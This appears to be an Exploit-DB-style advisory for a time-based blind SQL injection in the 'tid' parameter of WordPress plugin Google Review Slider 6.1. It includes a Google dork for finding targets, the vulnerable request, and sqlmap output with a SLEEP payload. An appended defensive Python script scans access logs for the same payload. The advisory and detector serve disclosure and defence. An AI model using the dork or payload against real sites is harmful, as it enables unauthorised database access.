vendor: Wordpress Plugin Google Review Slider
by: Princy Edward
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: Wordpress Plugin Google Review Slider
Affected Version From: 6.1
Affected Version To: 6.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_plugin:wp-google-places-review-slider
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Apache/2.2.24 (CentOS)
2019

WordPress Plugin Google Review Slider 6.1 – ‘tid’ SQL Injection

A SQL injection vulnerability was discovered in Wordpress Plugin Google Review Slider 6.1. The 'tid' GET parameter of the wp_google-templates_posts admin page is injectable. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which allows the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to version 6.2 of the Wordpress Plugin Google Review Slider.

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward
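
A defender-side check for the request shown in the PoC, added here as an example (it is not part of the original advisory or the plugin's code): it scans web-server access logs for requests to the plugin's admin page whose 'tid' value is not a plain integer. The combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin page slug and parameter name are taken from the PoC request above.
PLUGIN_PAGE = "wp_google-templates_posts"
PARAM = "tid"

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Jul/2019:10:00:01 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=abc&taction=edit HTTP/1.1" 200 5120 "-" "-"
203.0.113.77 - - [02/Jul/2019:10:02:13 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1%20AND%20(SELECT%205357%20FROM%20(SELECT(SLEEP(5)))kHQz)&_wpnonce=abc&taction=edit HTTP/1.1" 200 5120 "-" "-"
203.0.113.10 - - [02/Jul/2019:10:03:40 +0000] "GET /wp-admin/admin.php?page=some-other-page&tid=abc HTTP/1.1" 200 812 "-" "-"
203.0.113.25 - - [02/Jul/2019:10:05:02 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=42&_wpnonce=abc&taction=edit HTTP/1.1" 200 5120 "-" "-"
"""


def suspicious_tid_requests(log_text):
    """Return (client_ip, timestamp, decoded_tid) for each request to the
    plugin page whose tid is anything other than ASCII digits."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes values, so encoded input is compared in clear.
        query = parse_qs(url.query, keep_blank_values=True)
        if PLUGIN_PAGE not in query.get("page", []):
            continue
        for value in query.get(PARAM, []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_tid_requests(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric tid: {value!r}")
```

Because the injection reported above is time-based blind, the responses carry normal status codes; the parameter value is the signal, not the status.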